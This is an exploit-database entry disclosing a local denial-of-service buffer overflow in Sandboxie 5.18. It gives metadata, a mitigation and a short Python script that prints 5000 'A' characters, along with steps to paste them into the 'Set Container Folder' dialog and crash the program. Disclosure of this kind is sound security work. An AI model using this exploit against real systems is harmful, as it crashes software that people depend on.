Sandboxie version 5.18 local Dos Exploit

vendor:

Sandboxie

by:

Greg Priest

7,5

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Sandboxie

Affected Version From: Sandboxie version 5.18

Affected Version To: Sandboxie version 5.18

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows7 x64 HUN/ENG Professional

2017

Sandboxie version 5.18 local Dos Exploit

A buffer overflow vulnerability exists in Sandboxie version 5.18 which allows an attacker to cause a denial of service condition by copying a string of 5000 'A' characters to the clipboard and then pasting it into the 'Set Container Folder' dialog box. This will cause the application to crash.

Mitigation:

Upgrade to the latest version of Sandboxie.

Source

Exploit-DB raw data:

author = '''
   
                ##############################################
                #    Created: ScrR1pTK1dd13                  #
                #    Name: Greg Priest                       #
                #    Mail: ScR1pTK1dd13.slammer@gmail.com    # 
                ##############################################
   
# Exploit Title: Sandboxie version 5.18 local Dos Exploit
# Date: 2017.05.25
# Exploit Author: Greg Priest
# Version: Sandboxie version 5.18 ... Released on 13 April 2017
# Tested on: Windows7 x64 HUN/ENG Professional
'''

overflow = "A" * 5000

instruction = '''

<1> Copy printed "AAAAA..." string to clipboard!
<2> Sandboxie Control->Sandbox->Set Container Folder
<3> Paste the buffer in the input then press ok
'''

print author
print overflow
print instruction